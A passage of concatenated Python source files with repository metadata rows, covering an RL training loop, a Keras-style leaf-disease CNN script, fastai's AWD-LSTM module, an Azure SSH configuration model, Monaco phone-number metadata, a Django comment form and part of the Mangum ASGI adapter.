            initial_exploration_policy ('Policy'): Policy used for exploration
                If None, then all exploration is done using policy
            pool (`PoolBase`): Sample pool to add samples to
        """
        # NOTE(review): _training_environment/_evaluation_environment/_policy/
        # _pool are set by the concrete subclass — confirm before calling.
        training_environment = self._training_environment
        evaluation_environment = self._evaluation_environment
        policy = self._policy
        pool = self._pool
        if not self._training_started:
            self._init_training()
            # Seed the pool with exploration samples before on-policy sampling.
            self._initial_exploration_hook(
                training_environment, self._initial_exploration_policy, pool)
        self.sampler.initialize(training_environment, policy, pool)
        # gtimer bookkeeping: stamps below measure per-phase wall-clock time.
        gt.reset_root()
        gt.rename_root('RLAlgorithm')
        gt.set_def_unique(False)
        self._training_before_hook()
        # Assigning the loop variable to self._epoch keeps progress resumable.
        for self._epoch in gt.timed_for(range(self._epoch, self._n_epochs)):
            self._epoch_before_hook()
            gt.stamp('epoch_before_hook')
            start_samples = self.sampler._total_samples
            for i in count():
                samples_now = self.sampler._total_samples
                self._timestep = samples_now - start_samples
                # End the epoch once enough samples were collected AND the
                # sampler can provide a full training batch.
                if (samples_now >= start_samples + self._epoch_length
                    and self.ready_to_train):
                    break
                self._timestep_before_hook()
                gt.stamp('timestep_before_hook')
                self._do_sampling(timestep=self._total_timestep)
                gt.stamp('sample')
                if self.ready_to_train:
                    self._do_training_repeats(timestep=self._total_timestep)
                gt.stamp('train')
                self._timestep_after_hook()
                gt.stamp('timestep_after_hook')
            # Collect enough recent paths to cover one epoch of samples.
            training_paths = self.sampler.get_last_n_paths(
                math.ceil(self._epoch_length / self.sampler._max_path_length))
            gt.stamp('training_paths')
            evaluation_paths = self._evaluation_paths(
                policy, evaluation_environment)
            gt.stamp('evaluation_paths')
            training_metrics = self._evaluate_rollouts(
                training_paths, training_environment)
            gt.stamp('training_metrics')
            if evaluation_paths:
                evaluation_metrics = self._evaluate_rollouts(
                    evaluation_paths, evaluation_environment)
                gt.stamp('evaluation_metrics')
            else:
                evaluation_metrics = {}
            self._epoch_after_hook(training_paths)
            gt.stamp('epoch_after_hook')
            sampler_diagnostics = self.sampler.get_diagnostics()
            diagnostics = self.get_diagnostics(
                iteration=self._total_timestep,
                batch=self._evaluation_batch(),
                training_paths=training_paths,
                evaluation_paths=evaluation_paths)
            time_diagnostics = gt.get_times().stamps.itrs
            # Flatten all metric groups into one namespaced OrderedDict.
            diagnostics.update(OrderedDict((
                *(
                    (f'evaluation/{key}', evaluation_metrics[key])
                    for key in sorted(evaluation_metrics.keys())
                ),
                *(
                    (f'training/{key}', training_metrics[key])
                    for key in sorted(training_metrics.keys())
                ),
                *(
                    (f'times/{key}', time_diagnostics[key][-1])
                    for key in sorted(time_diagnostics.keys())
                ),
                *(
                    (f'sampler/{key}', sampler_diagnostics[key])
                    for key in sorted(sampler_diagnostics.keys())
                ),
                ('epoch', self._epoch),
                ('timestep', self._timestep),
                ('timesteps_total', self._total_timestep),
                ('train-steps', self._num_train_steps),
            )))
            if self._eval_render_kwargs and hasattr(
                    evaluation_environment, 'render_rollouts'):
                # TODO(hartikainen): Make this consistent such that there's no
                # need for the hasattr check.
                # NOTE(review): the hasattr check inspects evaluation_environment
                # but the call below goes to training_environment — confirm
                # which environment is intended here.
                training_environment.render_rollouts(evaluation_paths)
            yield diagnostics
        self.sampler.terminate()
        self._training_after_hook()
        # Final yield signals completion alongside the last diagnostics.
        yield {'done': True, **diagnostics}
    def _evaluation_paths(self, policy, evaluation_env):
        if self._eval_n_episodes < 1: return ()
        with policy.set_deterministic(self._eval_deterministic):
            paths = rollouts(
                self._eval_n_episodes,
                evaluation_env,
                policy,
                self.sampler._max_path_length,
                render_kwargs=self._eval_render_kwargs)
        should_save_video = (
            self._video_save_frequency > 0
            and self._epoch % self._video_save_frequency == 0)
        if should_save_video:
            for i, path in enumerate(paths):
                # pop() drops the frames from the path so they are not kept in memory.
                video_frames = path.pop('images')
                video_file_name = f'evaluation_path_{self._epoch}_{i}.avi'
                video_file_path = os.path.join(
                    os.getcwd(), 'videos', video_file_name)
                save_video(video_frames, video_file_path)
        return paths
    def _evaluate_rollouts(self, episodes, env):
        """Compute evaluation metrics for the given rollouts."""
        episodes_rewards = [episode['rewards'] for episode in episodes]
        episodes_reward = [np.sum(episode_rewards)
                           for episode_rewards in episodes_rewards]
        episodes_length = [episode_rewards.shape[0]
                           for episode_rewards in episodes_rewards]
        diagnostics = OrderedDict((
            ('episode-reward-mean', np.mean(episodes_reward)),
            ('episode-reward-min', np.min(episodes_reward)),
            ('episode-reward-max', np.max(episodes_reward)),
            ('episode-reward-std', np.std(episodes_reward)),
            ('episode-length-mean', np.mean(episodes_length)),
            ('episode-length-min', np.min(episodes_length)),
            ('episode-length-max', np.max(episodes_length)),
            ('episode-length-std', np.std(episodes_length)),
        ))
        # Let the environment contribute its own per-path diagnostics.
        env_infos = env.get_path_infos(episodes)
        for key, value in env_infos.items():
            diagnostics[f'env_infos/{key}'] = value
        return diagnostics
    @abc.abstractmethod
    def get_diagnostics(self,
                        iteration,
                        batch,
                        training_paths,
                        evaluation_paths):
        raise NotImplementedError
    @property
    def ready_to_train(self):
        # True when the sampler's pool can supply a full training batch.
        return self.sampler.batch_ready()
    def _do_sampling(self, timestep):
        self.sampler.sample()
    def _do_training_repeats(self, timestep):
        """Repeat training _n_train_repeat times every _train_every_n_steps"""
        if timestep % self._train_every_n_steps > 0: return
        # Stop repeating once this epoch already trained more than the
        # per-timestep cap allows.
        trained_enough = (
            self._train_steps_this_epoch
            > self._max_train_repeat_per_timestep * self._timestep)
        if trained_enough: return
        for i in range(self._n_train_repeat):
            self._do_training(
                iteration=timestep,
                batch=self._training_batch())
        self._num_train_steps += self._n_train_repeat
        self._train_steps_this_epoch += self._n_train_repeat
    @abc.abstractmethod
    def _do_training(self, iteration, batch):
        raise NotImplementedError
    @abc.abstractmethod
    def _init_training(self):
        raise NotImplementedError
    @property
    def tf_saveables(self):
        # Subclasses return the TF objects that should go into checkpoints.
        return {}
    def __getstate__(self):
        # Only pickle the scalar progress counters; roll the epoch forward when
        # the current epoch's timesteps are complete.
        state = {
            '_epoch_length': self._epoch_length,
            '_epoch': (
                self._epoch + int(self._timestep >= self._epoch_length)),
            '_timestep': self._timestep % self._epoch_length,
            '_num_train_steps': self._num_train_steps,
        }
        return state
    def __setstate__(self, state):
        self.__dict__.update(state)
| 35.473923
| 79
| 0.593774
|
4a1100b0867263baf5006efc8e3c565f94d310cd
| 3,079
|
py
|
Python
|
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
cnn.py
|
sudipjangam/Leaf-Disease-Detection-and-Remedies-Recommendation-using-Machine-Learning
|
6a460d86da6e9974247de4902ecdf6537d6e2025
|
[
"Unlicense"
] | null | null | null |
import cv2
import numpy as np
import os
from random import shuffle
from tqdm import tqdm
# NOTE(review): hard-coded Windows paths — adjust to the local dataset location.
TRAIN_DIR = 'D:\\pr\\pr\\train\\train'
TEST_DIR = 'D:\\pr\\pr\\test\\test'
IMG_SIZE = 50  # every image is resized to IMG_SIZE x IMG_SIZE before use
LR = 1e-3  # learning rate passed to the regression/Adam optimizer
MODEL_NAME = 'healthyvsunhealthy-{}-{}.model'.format(LR, '2conv-basic')  # checkpoint file name
def label_img(img):
    """Map an image file name to its one-hot class label.

    The class is encoded in the first character of the file name:
    'h', 'b', 'v' or 'l'.

    Args:
        img: image file name (only its first character is inspected).

    Returns:
        A 4-element one-hot list.

    Raises:
        ValueError: if the file name does not start with a known class letter.
            (Previously this silently returned None, which then flowed into
            np.array(label) and corrupted the cached training data.)
    """
    labels = {
        'h': [1, 0, 0, 0],
        'b': [0, 1, 0, 0],
        'v': [0, 0, 1, 0],
        'l': [0, 0, 0, 1],
    }
    word_label = img[0]
    if word_label not in labels:
        raise ValueError(
            f"Unrecognized class letter {word_label!r} in file name {img!r}")
    return labels[word_label]
def create_train_data():
    """Read every training image, build (image, one-hot label) pairs, shuffle and cache them."""
    samples = []
    for file_name in tqdm(os.listdir(TRAIN_DIR)):
        one_hot = label_img(file_name)
        image = cv2.imread(os.path.join(TRAIN_DIR, file_name), cv2.IMREAD_COLOR)
        image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
        samples.append([np.array(image), np.array(one_hot)])
    shuffle(samples)
    # Cache to disk so later runs can skip the (slow) image decoding.
    np.save('train_data.npy', samples)
    return samples
def process_test_data():
    """Read every test image, pair it with its numeric file id, shuffle and cache the result."""
    samples = []
    for file_name in tqdm(os.listdir(TEST_DIR)):
        image_id = file_name.split('.')[0]
        image = cv2.imread(os.path.join(TEST_DIR, file_name), cv2.IMREAD_COLOR)
        image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
        samples.append([np.array(image), image_id])
    shuffle(samples)
    # Cache to disk so later runs can skip the (slow) image decoding.
    np.save('test_data.npy', samples)
    return samples
# Build (or rebuild) the cached training set; reads every image under TRAIN_DIR.
train_data = create_train_data()
from tensorflow.python.framework import ops
# Clear any graph left from a previous run so layer names do not collide.
ops.reset_default_graph()
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
# Five conv + max-pool stages over IMG_SIZE x IMG_SIZE RGB input, then a dense
# head ending in a 4-way softmax (one class per label produced by label_img).
convnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 3], name='input')
convnet = conv_2d(convnet, 32, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 64, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 128, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 32, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = conv_2d(convnet, 64, 3, activation='relu')
convnet = max_pool_2d(convnet, 3)
convnet = fully_connected(convnet, 1024, activation='relu')
# NOTE(review): tflearn's dropout argument is keep_prob — 0.8 keeps 80%; confirm intent.
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 4, activation='softmax')
convnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')
model = tflearn.DNN(convnet, tensorboard_dir='log')
# Resume from a previous checkpoint when one exists on disk.
if os.path.exists('{}.meta'.format(MODEL_NAME)):
    model.load(MODEL_NAME)
    print('model loaded!')
# Hold out the last 500 (already shuffled) samples as a validation split.
train = train_data[:-500]
test = train_data[-500:]
X = np.array([i[0] for i in train]).reshape(-1,IMG_SIZE,IMG_SIZE,3)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1,IMG_SIZE,IMG_SIZE,3)
test_y = [i[1] for i in test]
model.fit({'input': X}, {'targets': Y}, n_epoch=8, validation_set=({'input': test_x}, {'targets': test_y}),
    snapshot_step=40, show_metric=True, run_id=MODEL_NAME)
model.save(MODEL_NAME)
| 29.893204
| 114
| 0.678467
|
4a110100c65f7d863d4c97ff4d0fa631848c53d4
| 8,148
|
py
|
Python
|
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | 1
|
2022-03-13T00:09:58.000Z
|
2022-03-13T00:09:58.000Z
|
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | null | null | null |
fastai/text/models/awdlstm.py
|
warner-benjamin/fastai
|
ceeba805f43e6258e7131d78706859f45c342575
|
[
"Apache-2.0"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/32_text.models.awdlstm.ipynb (unless otherwise specified).
from __future__ import annotations
__all__ = ['dropout_mask', 'RNNDropout', 'WeightDropout', 'EmbeddingDropout', 'AWD_LSTM', 'awd_lstm_lm_split',
'awd_lstm_lm_config', 'awd_lstm_clas_split', 'awd_lstm_clas_config']
# Cell
#nbdev_comment from __future__ import annotations
from ...data.all import *
from ..core import *
# Cell
def dropout_mask(
    x:Tensor, # Source tensor, output will be of the same type as `x`
    sz:list, # Size of the dropout mask as `int`s
    p:float # Dropout probability
) -> Tensor: # Multiplicative dropout mask
    "Return a dropout mask of the same type as `x`, size `sz`, with probability `p` to cancel an element."
    keep = 1 - p
    # new_empty keeps x's dtype/device; scaling by 1/keep preserves expectation.
    mask = x.new_empty(*sz)
    mask.bernoulli_(keep)
    return mask.div_(keep)
# Cell
class RNNDropout(Module):
    "Dropout with probability `p` that is consistent on the seq_len dimension."
    def __init__(self, p:float=0.5): self.p=p
    def forward(self, x):
        # Identity in eval mode or when dropout is disabled.
        if self.p == 0. or not self.training: return x
        # One mask per (batch, feature) position, broadcast over seq_len (dim 1).
        mask_size = (x.size(0), 1, *x.shape[2:])
        return x * dropout_mask(x.data, mask_size, self.p)
# Cell
class WeightDropout(Module):
    "A module that wraps another layer in which some weights will be replaced by 0 during training."
    def __init__(self,
        module:nn.Module, # Wrapped module
        weight_p:float, # Weight dropout probability
        layer_names:(str,list)='weight_hh_l0' # Name(s) of the parameters to apply dropout to
    ):
        self.module,self.weight_p,self.layer_names = module,weight_p,L(layer_names)
        for layer in self.layer_names:
            #Makes a copy of the weights of the selected layers.
            # The raw weight becomes a parameter of this wrapper; the wrapped
            # module keeps a plain (non-parameter) clone that forward() refreshes.
            w = getattr(self.module, layer)
            delattr(self.module, layer)
            self.register_parameter(f'{layer}_raw', nn.Parameter(w.data))
            setattr(self.module, layer, w.clone())
        if isinstance(self.module, (nn.RNNBase, nn.modules.rnn.RNNBase)):
            # flatten_parameters would recombine the weights and break the
            # dropout indirection, so neutralize it on RNN modules.
            self.module.flatten_parameters = self._do_nothing
    def _setweights(self):
        "Apply dropout to the raw weights."
        for layer in self.layer_names:
            raw_w = getattr(self, f'{layer}_raw')
            # Training: dropped-out view of the raw weight; eval: plain clone.
            if self.training: w = F.dropout(raw_w, p=self.weight_p)
            else: w = raw_w.clone()
            setattr(self.module, layer, w)
    def forward(self, *args):
        self._setweights()
        with warnings.catch_warnings():
            # To avoid the warning that comes because the weights aren't flattened.
            warnings.simplefilter("ignore", category=UserWarning)
            return self.module(*args)
    def reset(self):
        # Restore clean (non-dropped) clones of the raw weights, then delegate.
        for layer in self.layer_names:
            raw_w = getattr(self, f'{layer}_raw')
            setattr(self.module, layer, raw_w.clone())
        if hasattr(self.module, 'reset'): self.module.reset()
    def _do_nothing(self): pass
# Cell
class EmbeddingDropout(Module):
    "Apply dropout with probability `embed_p` to an embedding layer `emb`."
    def __init__(self,
        emb:nn.Embedding, # Wrapped embedding layer
        embed_p:float # Embedding layer dropout probability
    ):
        self.emb,self.embed_p = emb,embed_p
    def forward(self, words, scale=None):
        if self.training and self.embed_p != 0:
            # Mask whole embedding rows (one Bernoulli draw per vocabulary entry).
            size = (self.emb.weight.size(0),1)
            mask = dropout_mask(self.emb.weight.data, size, self.embed_p)
            masked_embed = self.emb.weight * mask
        else: masked_embed = self.emb.weight
        # NOTE(review): in eval mode masked_embed aliases the live weight
        # tensor, so mul_(scale) mutates the embedding weights in place —
        # confirm this is intended when `scale` is used.
        if scale: masked_embed.mul_(scale)
        return F.embedding(words, masked_embed, ifnone(self.emb.padding_idx, -1), self.emb.max_norm,
                           self.emb.norm_type, self.emb.scale_grad_by_freq, self.emb.sparse)
# Cell
class AWD_LSTM(Module):
    "AWD-LSTM inspired by https://arxiv.org/abs/1708.02182"
    initrange=0.1
    def __init__(self,
        vocab_sz:int, # Size of the vocabulary
        emb_sz:int, # Size of embedding vector
        n_hid:int, # Number of features in hidden state
        n_layers:int, # Number of LSTM layers
        pad_token:int=1, # Padding token id
        hidden_p:float=0.2, # Dropout probability for hidden state between layers
        input_p:float=0.6, # Dropout probability for LSTM stack input
        embed_p:float=0.1, # Embedding layer dropout probability
        weight_p:float=0.5, # Hidden-to-hidden weight dropout probability for LSTM layers
        bidir:bool=False # If set to `True` uses bidirectional LSTM layers
    ):
        store_attr('emb_sz,n_hid,n_layers,pad_token')
        self.bs = 1
        self.n_dir = 2 if bidir else 1
        self.encoder = nn.Embedding(vocab_sz, emb_sz, padding_idx=pad_token)
        self.encoder_dp = EmbeddingDropout(self.encoder, embed_p)
        # First layer takes emb_sz inputs; the last layer outputs emb_sz so the
        # decoder's weights can be tied with the encoder.
        self.rnns = nn.ModuleList([self._one_rnn(emb_sz if l == 0 else n_hid, (n_hid if l != n_layers - 1 else emb_sz)//self.n_dir,
                                                 bidir, weight_p, l) for l in range(n_layers)])
        self.encoder.weight.data.uniform_(-self.initrange, self.initrange)
        self.input_dp = RNNDropout(input_p)
        self.hidden_dps = nn.ModuleList([RNNDropout(hidden_p) for l in range(n_layers)])
        self.reset()
    def forward(self, inp:Tensor, from_embeds:bool=False):
        # `inp` is token ids (bs, sl), or precomputed embeddings when from_embeds.
        bs,sl = inp.shape[:2] if from_embeds else inp.shape
        # Resize the cached hidden state when the batch size changes.
        if bs!=self.bs: self._change_hidden(bs)
        output = self.input_dp(inp if from_embeds else self.encoder_dp(inp))
        new_hidden = []
        for l, (rnn,hid_dp) in enumerate(zip(self.rnns, self.hidden_dps)):
            output, new_h = rnn(output, self.hidden[l])
            new_hidden.append(new_h)
            # No inter-layer dropout after the last LSTM layer.
            if l != self.n_layers - 1: output = hid_dp(output)
        # Detach so BPTT does not flow across batch boundaries.
        self.hidden = to_detach(new_hidden, cpu=False, gather=False)
        return output
    def _change_hidden(self, bs):
        self.hidden = [self._change_one_hidden(l, bs) for l in range(self.n_layers)]
        self.bs = bs
    def _one_rnn(self, n_in, n_out, bidir, weight_p, l):
        "Return one of the inner rnn"
        rnn = nn.LSTM(n_in, n_out, 1, batch_first=True, bidirectional=bidir)
        return WeightDropout(rnn, weight_p)
    def _one_hidden(self, l):
        "Return one hidden state"
        nh = (self.n_hid if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
        return (one_param(self).new_zeros(self.n_dir, self.bs, nh), one_param(self).new_zeros(self.n_dir, self.bs, nh))
    def _change_one_hidden(self, l, bs):
        # Grow by zero-padding, shrink by slicing; keep as-is when bs matches.
        if self.bs < bs:
            nh = (self.n_hid if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
            return tuple(torch.cat([h, h.new_zeros(self.n_dir, bs-self.bs, nh)], dim=1) for h in self.hidden[l])
        if self.bs > bs: return (self.hidden[l][0][:,:bs].contiguous(), self.hidden[l][1][:,:bs].contiguous())
        return self.hidden[l]
    def reset(self):
        "Reset the hidden states"
        [r.reset() for r in self.rnns if hasattr(r, 'reset')]
        self.hidden = [self._one_hidden(l) for l in range(self.n_layers)]
# Cell
def awd_lstm_lm_split(model):
    "Split a RNN `model` in groups for differential learning rates."
    rnn_groups = [
        nn.Sequential(rnn, dp)
        for rnn, dp in zip(model[0].rnns, model[0].hidden_dps)
    ]
    # Encoder (with its dropout wrapper) and decoder head form the final group.
    head_group = nn.Sequential(model[0].encoder, model[0].encoder_dp, model[1])
    return L(rnn_groups + [head_group]).map(params)
# Cell
# Default hyper-parameters for an AWD-LSTM language model (AWD_LSTM encoder + tied decoder head).
awd_lstm_lm_config = dict(emb_sz=400, n_hid=1152, n_layers=3, pad_token=1, bidir=False, output_p=0.1,
                          hidden_p=0.15, input_p=0.25, embed_p=0.02, weight_p=0.2, tie_weights=True, out_bias=True)
# Cell
def awd_lstm_clas_split(model):
    "Split a RNN `model` in groups for differential learning rates."
    encoder = model[0].module
    layer_groups = [nn.Sequential(encoder.encoder, encoder.encoder_dp)]
    for rnn, dp in zip(encoder.rnns, encoder.hidden_dps):
        layer_groups.append(nn.Sequential(rnn, dp))
    # The classifier head is trained as its own group.
    layer_groups.append(model[1])
    return L(layer_groups).map(params)
# Cell
# Default hyper-parameters for an AWD-LSTM text classifier (heavier dropout than the LM config).
awd_lstm_clas_config = dict(emb_sz=400, n_hid=1152, n_layers=3, pad_token=1, bidir=False, output_p=0.4,
                            hidden_p=0.3, input_p=0.4, embed_p=0.05, weight_p=0.5)
| 44.282609
| 131
| 0.650466
|
4a11025a55876475d61bd91d8972cac6ae9f1dac
| 1,065
|
py
|
Python
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2021-09-07T18:36:04.000Z
|
2021-09-07T18:36:04.000Z
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/ssh_configuration.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SshConfiguration(Model):
    """SSH configuration for Linux based VMs running on Azure.

    :param public_keys: The list of SSH public keys used to authenticate with
     linux based VMs.
    :type public_keys:
     list[~azure.mgmt.compute.v2016_04_30_preview.models.SshPublicKey]
    """

    # msrest (de)serialization map: Python attribute -> wire-format key/type.
    _attribute_map = {
        'public_keys': {'key': 'publicKeys', 'type': '[SshPublicKey]'},
    }

    def __init__(self, **kwargs):
        super(SshConfiguration, self).__init__(**kwargs)
        # Optional; absent keys deserialize to None.
        self.public_keys = kwargs.get('public_keys', None)
| 34.354839
| 77
| 0.610329
|
4a1102a270ec95019010d0c6b79c743ee38d5316
| 993
|
py
|
Python
|
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | 1
|
2015-01-31T01:17:14.000Z
|
2015-01-31T01:17:14.000Z
|
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | null | null | null |
ExtraModules/phonenumbers/shortdata/region_MC.py
|
chirantana-trust/web-chirantana
|
18e2fb105fc5a9f55586c55096780c062ad9f2bc
|
[
"Unlicense"
] | null | null | null |
"""Auto-generated file, do not edit by hand. MC metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_MC = PhoneMetadata(id='MC', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='1\\d{1,2}', possible_number_pattern='\\d{2,3}'),
toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='1(?:12|[578])', possible_number_pattern='\\d{2,3}', example_number='112'),
short_code=PhoneNumberDesc(national_number_pattern='1(?:12|41|[578])', possible_number_pattern='\\d{2,3}', example_number='112'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
carrier_specific=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_data=True)
| 76.384615
| 133
| 0.783484
|
4a1102cd5762dcb269d8c993d0729cf370abc698
| 1,509
|
py
|
Python
|
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | null | null | null |
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | 33
|
2017-02-14T15:45:16.000Z
|
2022-03-11T23:22:29.000Z
|
bettertexts/forms.py
|
citizenline/citizenline
|
5c8317fe7e18a485bb8c572cc3c55707d0303525
|
[
"MIT"
] | null | null | null |
from django_comments.forms import CommentForm
from django import forms
from django.utils.translation import ugettext_lazy as _
from bettertexts.models import TextComment
class TextCommentForm(CommentForm):
    """Comment form with opt-in checkboxes for staying informed/involved."""

    def __init__(self, *args, **kwargs):
        super(TextCommentForm, self).__init__(*args, **kwargs)
        # Relabel the builtin fields and make them mandatory.
        for field_name, field_label in (
            ("name", _("Name")),
            ("email", _("Email address")),
            ("comment", _("Comment")),
        ):
            self.fields[field_name].label = field_label
            self.fields[field_name].required = True
        # The URL field is kept for the framework but never shown.
        self.fields["url"].widget = forms.HiddenInput()

    inform = forms.BooleanField(
        required=False, label=_("Keep me informed"), widget=forms.CheckboxInput
    )
    involved = forms.BooleanField(
        required=False, label=_("Keep me involved"), widget=forms.CheckboxInput
    )

    class Meta:
        fields = ["name", "email", "inform", "comment"]

    def get_comment_model(self):
        """
        override to provide a custom comment model.
        """
        return TextComment

    def get_comment_create_data(self, site_id=None):
        """
        Override to add inform and involved field
        """
        data = super(TextCommentForm, self).get_comment_create_data(site_id)
        # Persist both opt-in flags on the created comment.
        extra = {
            "inform": self.cleaned_data["inform"],
            "involved": self.cleaned_data["involved"],
        }
        data.update(extra)
        return data
| 31.4375
| 79
| 0.622929
|
4a1102dcc914f81241efa01b8276e048cbbebf9d
| 4,590
|
py
|
Python
|
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
mangum/adapter.py
|
kita99/mangum
|
961ff7cf3b9fa70ccbca188b13530546fd3359b6
|
[
"MIT"
] | null | null | null |
import logging
from contextlib import ExitStack
from typing import (
Any,
ContextManager,
Callable,
Dict,
Optional,
TYPE_CHECKING,
)
from .exceptions import ConfigurationError
from .handlers import AbstractHandler
from .protocols import HTTPCycle, WebSocketCycle, LifespanCycle
from .backends import WebSocket
from .types import ASGIApp, WsRequest
if TYPE_CHECKING:  # pragma: no cover
    from awslambdaric.lambda_context import LambdaContext

# MIME types treated as text responses in API Gateway (presumably merged with
# the user-supplied `text_mime_types` mentioned in Mangum's docstring —
# the merge happens outside this file; confirm in the handlers).
DEFAULT_TEXT_MIME_TYPES = [
    "text/",
    "application/json",
    "application/javascript",
    "application/xml",
    "application/vnd.api+json",
]

# Package-level logger for the adapter.
logger = logging.getLogger("mangum")
class Mangum:
    """
    Creates an adapter instance.

    * **app** - An asynchronous callable that conforms to version 3.0 of the ASGI
    specification. This will usually be an ASGI framework application instance.
    * **lifespan** - A string to configure lifespan support. Choices are `auto`, `on`,
    and `off`. Default is `auto`.
    * **api_gateway_base_path** - Base path to strip from URL when using a custom
    domain name.
    * **text_mime_types** - A list of MIME types to include with the defaults that
    should not return a binary response in API Gateway.
    * **dsn** - A connection string required to configure a supported WebSocket backend.
    * **api_gateway_endpoint_url** - A string endpoint url to use for API Gateway when
    sending data to WebSocket connections. Default is to determine this automatically.
    * **api_gateway_region_name** - A string region name to use for API Gateway when
    sending data to WebSocket connections. Default is `AWS_REGION` environment variable.
    * **connect_hook** / **disconnect_hook** - Optional callables forwarded to the
    WebSocket backend.

    Raises `ConfigurationError` for an invalid `lifespan` value or a
    non-callable hook.
    """

    app: ASGIApp
    lifespan: str = "auto"
    dsn: Optional[str] = None
    api_gateway_endpoint_url: Optional[str] = None
    api_gateway_region_name: Optional[str] = None
    connect_hook: Optional[Callable] = None
    disconnect_hook: Optional[Callable] = None

    def __init__(
        self,
        app: ASGIApp,
        lifespan: str = "auto",
        dsn: Optional[str] = None,
        api_gateway_endpoint_url: Optional[str] = None,
        api_gateway_region_name: Optional[str] = None,
        connect_hook: Optional[Callable] = None,
        disconnect_hook: Optional[Callable] = None,
        **handler_kwargs: Dict[str, Any]
    ) -> None:
        self.app = app
        self.lifespan = lifespan
        self.dsn = dsn
        self.api_gateway_endpoint_url = api_gateway_endpoint_url
        self.api_gateway_region_name = api_gateway_region_name
        # Extra kwargs (e.g. api_gateway_base_path, text_mime_types) are
        # forwarded untouched to the trigger-specific handler.
        self.handler_kwargs = handler_kwargs
        self.connect_hook = connect_hook
        self.disconnect_hook = disconnect_hook

        if self.lifespan not in ("auto", "on", "off"):
            raise ConfigurationError(
                "Invalid argument supplied for `lifespan`. Choices are: auto|on|off"
            )

        # Consistency fix: raise ConfigurationError (as for `lifespan` above)
        # instead of a bare Exception; callers catching Exception still work.
        if connect_hook and not callable(connect_hook):
            raise ConfigurationError("Invalid connect_hook supplied. Must be a callable")

        if disconnect_hook and not callable(disconnect_hook):
            raise ConfigurationError("Invalid disconnect_hook supplied. Must be callable")

    def __call__(self, event: dict, context: "LambdaContext") -> dict:
        """Lambda entry point: route the event through the ASGI application.

        Dispatches WebSocket events through a `WebSocketCycle` and everything
        else through an `HTTPCycle`, optionally wrapped in ASGI lifespan
        startup/shutdown.
        """
        logger.debug("Event received.")

        with ExitStack() as stack:
            if self.lifespan != "off":
                # Lifespan startup runs on entry, shutdown when the stack unwinds.
                lifespan_cycle: ContextManager = LifespanCycle(self.app, self.lifespan)
                stack.enter_context(lifespan_cycle)

            # Infer the trigger type (HTTP API, REST API, WebSocket, ...) from
            # the raw event shape.
